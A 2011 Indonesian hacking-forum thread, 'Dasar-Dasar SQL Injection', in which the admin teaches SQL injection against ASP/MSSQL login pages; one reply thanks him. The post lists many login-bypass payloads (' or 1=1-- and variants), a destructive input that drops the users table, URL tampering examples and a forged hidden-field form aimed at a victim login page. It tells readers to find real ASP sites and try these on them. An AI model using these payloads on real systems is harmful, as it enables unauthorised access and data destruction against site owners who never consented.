Would you like to react to this message? Create an account in a few clicks or log in to continue.

Login

Lupa password?

Latest topics

» Setting GPRS
Dasar-Dasar SQL Injection EmptyTue Nov 22, 2011 2:31 pm by nandazzzz

» Tools Untuk Menganalisa Suatu Virus
Dasar-Dasar SQL Injection EmptyTue Nov 22, 2011 2:29 pm by nandazzzz

» admin masu
Dasar-Dasar SQL Injection EmptyTue Nov 22, 2011 2:28 pm by nandazzzz

» Cara Memperkuat Sinyal Modem USB
Dasar-Dasar SQL Injection EmptyTue Nov 22, 2011 2:27 pm by nandazzzz

» Mempercepat koneksi mozilla
Dasar-Dasar SQL Injection EmptyTue Nov 22, 2011 2:26 pm by nandazzzz

» Memblock situs" berbau negatif
Dasar-Dasar SQL Injection EmptyTue Nov 22, 2011 2:25 pm by nandazzzz

» pengumuman buat penghuni forum
Dasar-Dasar SQL Injection EmptyThu Oct 06, 2011 3:49 pm by Nyonya oXside

» Membangun Web Server pada Jaringan Lokal (LAN)
Dasar-Dasar SQL Injection EmptyWed Oct 05, 2011 7:21 pm by farizmht

»  Perbedaan Virus Dengan Worm
Dasar-Dasar SQL Injection EmptyWed Oct 05, 2011 7:12 pm by farizmht

November 2024

MonTueWedThuFriSatSun
    123
45678910
11121314151617
18192021222324
252627282930 

Calendar Calendar

Donate money

Donations will be used to buy all prizes in tournaments. If no one donates, then the only prize we can give is rank points. So please donate whenever possible, even if you don't donate much.
~ Thanks-Admin(lutfi oXside)

2 posters

    Dasar-Dasar SQL Injection

    lutfi oXside89
    lutfi oXside89
    Admin
    Admin


    Jumlah posting : 90
    Points : 175
    Reputation : 0
    Join date : 25.08.11
    Age : 28
    Lokasi : bandarlampung

    Dasar-Dasar SQL Injection Empty Dasar-Dasar SQL Injection

    Post  lutfi oXside89 Mon Sep 26, 2011 11:00 am

    Sebelum membahas tentang sql injection pertama-tama saya akan menerangkan apa itu sql injection dan
    kenapa bisa terjadi.
    Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke 'query'
    dengan cara manipulasi data input ke applikasi tsb.
    Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan MySql ,
    disini gw cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5 dan
    beberapa sql injection pada url.
    Biasa Sql Injection dilakukan pada login page pada asp seperti di :
    admin\login.asp
    login.asp
    Jadi yang akan menjadi target itu page tersebut ,
    sekarang kita mulai aja dengan dasar-dasar sql injection :d.
    Biasanya di sql statment
    select id, user_name, password from user
    maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.
    Bisanya pada login page dengan mengunakan statment result setnya sebagai berikut :
    select id, user_name,password from user where name = 'echo' and password='password'
    Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browser
    Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL atau "Structured Query Language"
    seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.
    Nah, ga tau kenapa karakter single quote 'breaks out'
    dari delimiter nya SQL Jadi kalau misal ada inputan
    User: echo';drop table user--
    dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya Very Happy
    oh iya '--' merukapan mark nya MSSQL, jadi perintah selanjutnya ga di execute.
    Sekarang untuk lebih jelasnya kita secara langsung pada login script seperti
    input login + password. Nama field nya 'login' dan 'pass'. dan
    SQL nya di asp: var sql = select * from users where username='"+login+"' and password='"+pass"'";
    coba kalau ada inputan: login: ';drop table users-- pass: chfn (*wink* negative)
    pasti ke drop tuh table users
    Aduh pada pusing ya , gini deh cara gampangnya adn kita lupakan yang diatas Razz kita langsung praktek aja>
    Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari login.asp atau
    admin\login.asp.
    Kalau udah dapet masukin nich variable sql nya
    user:admin
    pass:' or 1=1--
    Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d
    atau :
    user:' or 1=1--
    admin:' or 1=1--
    Mas , ga bisa nich gimana ya ?
    Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisa
    buat sendiri script dan tes karena gw udah coba buat sendiri dan berhasil tanpa melakukan paket filter
    pada db nya . Untuk test apakah suatu page mempunyai vulnerable , gini caranya :
    Kalian pernh melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :
    http://vivtim/index.asp?id=10
    Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit tambahan
    pada addressnya seperti memasukan : test'1=1--
    menjadi http://victim/index.asp?id=test'1=1--
    Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page target
    lalu kita tamhankan hidden field pada source tersebut sebagai contoh :
    <FORM action=http://victim/admin/login.asp method=post>
    <input type=hidden name=A value="test' or 1=1--">
    </FORM>
    Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username.
    ingat script ini ditamhakna pd script yg sudah kalian download dr target .

    Variable ' or 1=1--
    Mungkin pada bertanya-tanya kenapa mengunakan variable 'or 1=1-- dan sangat penting.Lihat contoh
    pada sebuah web tertulis http://victim/index.asp?category=laptop
    Dalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb .
    Kalau ditulis dalam script ASP maka akan menjadi :
    v_cat = request("category")
    sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
    set rs=conn.execute(sqlstr)
    Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pd sql statment menjadi
    SELECT * FROM product WHERE PCategory='laptop'
    lalu apa hub dengan 'or 1=1---
    coba kalau kita ganti http://victim/index.asp?category=laptop menjadi
    http://victim/index.asp?category=laptop'or 1=1--
    Kita lihat varible v_cat sekarang menjadi laptop'or 1=1-- lalu dalam SQL query nya menjadi
    SELECT * FROM product WHERE PCategory='laptop' or 1=1--'
    artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong) yang menyebabkan
    Sql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkan
    kita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda -- merupakan
    mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login page
    Kita bisa masuk kedalam login page tanpa password dan user name :d.
    Kemungkinan-kemungkinan variable lainya :
    or 1=1--
    " or 1=1--
    or 1=1--
    ' or 'a'='a
    " or "a"="a
    ') or ('a'='a
    ' or 0=0 --
    " or 0=0 --
    or 0=0 --
    ' or 0=0 #
    " or 0=0 #
    or 0=0 #
    ' or 'x'='x
    " or "x"="x
    ') or ('x'='x
    ' or 1=1--
    " or 1=1--
    or 1=1--
    ' or a=a--
    " or "a"="a
    ') or ('a'='a
    ") or ("a"="a
    hi" or "a"="a
    hi" or 1=1 --
    hi' or 1=1 --
    hi' or 'a'='a
    hi') or ('a'='a
    hi") or ("a"="a

    Selain masuk kedalam page tersebut kita juga bisa memanfaatkannya untuk remote execution dengan sql Injection
    dan untuk artikel akan dimasukan dalam ezine 3 echo.or.id .Semoga artikel ini berguna Question
    farizmht
    farizmht
    good job
    good job


    Jumlah posting : 67
    Points : 91
    Reputation : 3
    Join date : 11.09.11
    Age : 29
    Lokasi : BANDAR LAMPUNG

    Dasar-Dasar SQL Injection Empty Re: Dasar-Dasar SQL Injection

    Post  farizmht Wed Oct 05, 2011 6:57 pm

    ijin nyimax gan ... Idea Idea Idea Idea

      Waktu sekarang Sun Nov 24, 2024 7:56 am